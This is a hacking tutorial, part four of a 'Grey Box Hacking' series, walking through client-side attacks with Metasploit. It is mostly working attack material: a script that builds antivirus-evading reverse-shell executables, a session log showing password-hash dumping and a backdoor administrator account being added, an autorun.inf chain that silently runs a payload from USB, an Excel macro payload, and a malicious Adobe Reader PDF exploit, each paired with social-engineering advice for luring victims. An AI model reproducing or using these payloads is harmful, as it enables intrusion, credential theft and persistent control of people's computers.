Client-Side Attack With Metasploit (Part 4)

This is part four of the Grey Box Hacking tutorials. Before discussing the client-side attack, it is important to first comprehend what client-side means before an attack using Metasploit can be understood.

In short, the client-side is when someone (the client) is doing operations on a client-server in a computer network.

A client-side attack takes advantage of the client-server relationship. The job of servers is to expose services to clients. With these services exposed, the clients can interact with them.  A good example would be an instant messaging application.

Since the server exposes services, it also exposes possible weaknesses in the network. As the client is connected to this network, they are also exposed to those same weaknesses. Attackers use these weaknesses to gain access to the network and to the clients’ computers. 

It is called a client-side attack because it requires the client to initiate a vulnerable service before the attack can take place. Savvy attackers use programs such as Metasploit to achieve this.

[0x04] – Client-Side Attack With Metasploit

A typical example of a client-side attack.

“A typical example of a client-side attack is a malicious web page targeting a specific browser vulnerability that, if the attack is successful, would give the malicious server complete control of the client system.

“Client-side attacks are not limited to the web setting but can occur on any client/server pairs, for example, e-mail, FTP, instant messaging, multimedia streaming, etc.

“Client-side attacks currently represent an easy attack vector because most attention in protection technology has been focused on the protection of exposed servers from remote attackers.

“Clients are only protected in environments where access from internal clients to servers on the Internet is restricted via traditional defenses like firewalls or proxies. However, a firewall, unless combined with other technologies such as IPS, only restricts network traffic; once the traffic is permitted, a client interacting with a server is at risk. More advanced corporate server filtering solutions are available, but typically these only protect a limited set of client technologies.” –honeynet.org

[0x04a] – Metasploit Payload Generator

Metasploit Payload Generator is a tool that allows one to easily create a malicious code. This is not a tool used to exploit a system. It is used to create the malicious payload and, which will then be saved as an “exe.” The tricky part of the operation is establishing a way to lure the target into downloading the payload onto their computer.

A feature is available to encode the payload so that it gets past most AV and IDS/IPS (13 Encoding Choices).
This is done by using Metasploit Payload Generator from Fast-Track.

#!/bin/bash
echo "###########################################"
echo "#### 0-Days Exploits with MetaCompiler ####"
echo "###########################################"
echo ""
echo -n "Enter your Listener IP Address: "
read ip
echo -n "Enter your Listener Port: "
read port
echo ""
echo "-= MetaCompiler Payloads =-"
echo ""
echo "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
echo "+ Meterpreter Reverse Connectback - windows/meterpreter/reverse_tcp +"
echo "+ VNC Inject Reverse Connectback - windows/vncinject/reverse_tcp +"
echo "+ Generic Reverse Shell - generic/shell_reverse_tcp +"
echo "+ Linux X86 Reverse Shell - linux/x86/shell_reverse_tcp +"
echo "+ Mac OSX (iphone) Reverse Shell - osx/ppc/shell/reverse_tcp +"
echo "+ Windows Reverse Shell - windows/shell/reverse_tcp +"
echo "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
echo ""
echo -n "Enter your Payload Exploit: "
read payload
echo -n "Enter your Output file name (xpl.exe): "
read file
echo ""
echo "-= Processing =-"
/pentest/exploits/framework3/msfpayload $payload LHOST=$ip LPORT=$port R | /pentest/exploits/framework3/msfencode -b '' -t exe -o $file
echo "Enjoy 0-Days Exploit with $file ;)"
echo ""
echo ""
echo "-= Now Waiting for Reverse Connection from Victim =-"
/pentest/exploits/framework3/msfcli multi/handler PAYLOAD=$payload LHOST=$ip LPORT=$port DisableCourtesyShell=True E

Below at the instructions for using Fast Track.

bt fast-track # ./fast-track.py -i
***********************************************
******* Performing dependency checks... *******
***********************************************
*** FreeTDS and PYMMSQL are installed. (Check) ***
*** PExpect is installed. (Check) ***
*** ClientForm is installed. (Check) ***
*** Psyco is installed. (Check) ***
*** Beautiful Soup is installed. (Check) ***
*** PyMills is installed. (Check) ***
Also ensure ProFTP, WinEXE, and SQLite3 is installed from
the Updates/Installation menu.
Your system has all requirements needed to run Fast-Track!
Fast-Track Main Menu:
Fast-Track - Where it's OK to finish in under 3 minutes...
Version: v4.0
Written by: David Kennedy (ReL1K)
http://www.securestate.com
http://www.thepentest.com
1. Fast-Track Updates
2. External Hacking
3. Internal Hacking
4. Exploits
5. SQLPwnage
6. Payload Generator
7. Tutorials
8. Changelog
9. Credits
10. About
11. Exit
Enter the number: 6
Configuration file not detected, running default path.
Recommend running setup.py install to configure Fast-Track.


#####################################
### ###
### Metasploit Payload Generator ###
### ###
### Written by: Dave Kennedy ###
### aka ReL1K ###
### ###
#####################################
#####################################


The Metasploit Payload Generator is a simple tool to
make it extremely easy to generate a payload and listener
on the Metasploit framework. This does not actually
exploit any systems, it will generate a metasploit payload
for you and save it to an executable. You then need to
someone get it on the remote server by yourself and get it
to execute correctly.
This will also encode your payload to get past most AV and
IDS/IPS.
What payload do you want to generate:
Name: Description:
1. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to the attacker.
2. Windows Reverse_TCP Meterpreter Spawn a Meterpreter shell on victim and send back to the attacker.
3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to the attacker.
4. Windows Bind Shell Execute payload and create an accepting port on remote system.
5. Windows Reflective Reverse VNC Spawn a VNC server on victim and send back to the attacker.
6. Windows Reflective Reverse Meterpreter Spawn a Meterpreter shell on the victim through Reflective to the attacker.

Enter choice (example 1-6): 2

Below is a list of encodings for bypassing most AV.

Select one of the below, Avoid_UTF8_tolower usually gets past them.
1. avoid_utf8_tolower
2. shikata_ga_nai
3. alpha_mixed
4. alpha_upper
5. call4_dword_xor
6. countdown
7. fnstenv_mov
8. jmp_call_additive
9. nonalpha
10. nonupper
11. unicode_mixed
12. unicode_upper
13. alpha2
14. No Encoding

Enter your choice : 2

Enter IP Address of the listener/attacker (reverse) or host/victim (bind shell): 192.168.80.131

Enter the port of the Listener: 5555

Do you want to create an EXE or Shellcode

1. Executable
2. Shellcode

Enter your choice: 1

Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 278
Options: LHOST=192.168.80.131,LPORT=5555,ENCODING=shikata_ga_nai
A payload has been created in this directory and is named 'payload.exe'. Enjoy!
Do you want to start a listener to receive the payload yes or no: yes
Launching Listener.

***********************************************************************************************
Launching MSFCLI on 'exploit/multi/handler' with PAYLOAD='windows/meterpreter/reverse_tcp'
Listening on IP: 192.168.80.131 on Local Port: 5555 Using encoding: ENCODING=shikata_ga_nai
***********************************************************************************************

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.80.131:5555 -> 192.168.80.1:13948)
meterpreter > getuid
Server username: LENOVO-X200prathan
meterpreter > use priv
Loading extension priv...success.
meterpreter > hashdump
Administrator:500:F703F386322B0662E72C57EF50F76A05:C62638B38308E651B21A0F2CCAB3AC9B
Guest:501:A0E150C75A17008EAAD3B435B51404EE:823893ADFAD2CDA6E1A414F3EBDF58F7
prathan:1003:879980DE48006E7EAAD3B435B51404EE:BA69764BCCF8F41121E0B3046CE46C67
TsInternetUser:1002:52FE1A30EB33BA7BE3BB722E78963414:3A07E408DB9CB2331C9C527B0F4A8C52
meterpreter > execute -H -i -f cmd.exe
Process 692 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:Documents and SettingsprathanDesktop>hostname
LENOVO-X200
C:Documents and SettingsprathanDesktop>net user cwh 1234 /add
net user cwh 1234 /add
The command completed successfully.
C:Documents and SettingsprathanDesktop>net localgroup administrators cwh /add
net localgroup administrators cwh /add
The command completed successfully.
C:Documents and SettingsprathanDesktop>net user
net user
User accounts for
-------------------------------------------------------------------------------
Administrator cwh Guest
prathan TsInternetUser
The command completed with one or more errors.

From Above, We can Attack victim from Social-engineering if they execute “payload.exe”. What’s happen If we use Autorun.inf to force them execute our files.

+autorun.inf
[autorun]
action=Open Files On Folder
icon=iconsdrive.ico
shellexecute=nircmd.exe execmd CALL batexeprogstart.bat
+icons
+nircmd.exe
+batexe
-progstart.bat
@echo off
nircmd.exe execmd CALL batexemoddump.bat
nircmd.exe execmd CALL batexemodsmax.bat
-moddump.bat
@echo off
nircmd.exe execmd .batexepayload.exe
-modsmax.bat
@echo off
start
nircmd.exe win max ititle "Remo"

If the victim opens a USB drive with Autorun or they Double-click the USB drive from My computer, the target system will be compromised.

[0x04b] – MS-Office Macro Ownage

MS Word, Excel, Powerpoint, as well as other similar programs can import VBscript to their files. Metasploit can generate VBScript that contains a Malicious.

In this example, we will show script for exploiting victim with MS-Excel. The victim machine will start reverse VNC to the attacker’s machine after the victim opens the MS-Excel file.

bt framework3 # ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.80.131 V > /tmp/script.bas

bt framework3 # ./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.80.131 DisableCourtesyShell=True E

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2658 bytes)
[*] Sleeping before handling stage...

Now we have “script.bas,” Open MSExcel -> Tools -> Macro -> Visual Basic Editor then import “script.bas” and SAVE Excel file.

After this is finished, the attacker employs human-to-human social engineering to manipulate them into opening MSExcel, enabling Macros. The attacker can then take control of the target’s computer.

[0x04c] – AdobeReader PDF Ownage

Metasploit has an exploit script for Generating Malicious PDF files used to issue an attack through “Adobe JBIG2Decode Memory Corruption.”

This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier.

When a malicious PDF is generated, it is sent to the victim(s). Social engineering is used to get them to download it onto their computer.

bt framework3 # msfconsole
_ _ _ _
| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| '_ ` _ / _ __/ _` / __| '_ | |/ _ | | __|
| | | | | | __/ || (_| __ |_) | | (_) | | |_
|_| |_| |_|___|____,_|___/ .__/|_|___/|_|__|
| |
|_|
=[ msf v3.3-dev
+ -- --=[ 288 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 56 aux
msf > use windows/fileformat/adobe_jbig2decode
msf exploit(adobe_jbig2decode) > set TARGET 0
TARGET => 0
msf exploit(adobe_jbig2decode) > set FILENAME malfile.pdf
FILENAME => malfile.pdf
msf exploit(adobe_jbig2decode) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_jbig2decode) > set LHOST 192.168.80.131
LHOST => 192.168.80.131
msf exploit(adobe_jbig2decode) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Creating 'malfile.pdf' file...
[*] Generated output file /pentest/exploits/framework3/data/exploits/malfile.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_jbig2decode) > exit
bt framework3 # ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444
LHOST=192.168.80.131 E
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stanger for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.80.131:4444 -> 192.168.80.132:1041)
meterpreter > getuid
Server username: WINXPvictim
meterpreter > execute -H -i -f cmd.exe
Process 692 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\victim\Desktop>

Other techniques such as “DNS Spoofing+IE7” was great for Mass Exploit, There is a video here that shows this technique.

This method uses Ettercap for DNS spoofing then use Metasploit for handling reverse shell from “IE7 MS09-002 Memory Corruption Vulnerability.” This forces all machines in the same network drive to the attacker’s machine.

Leave a Reply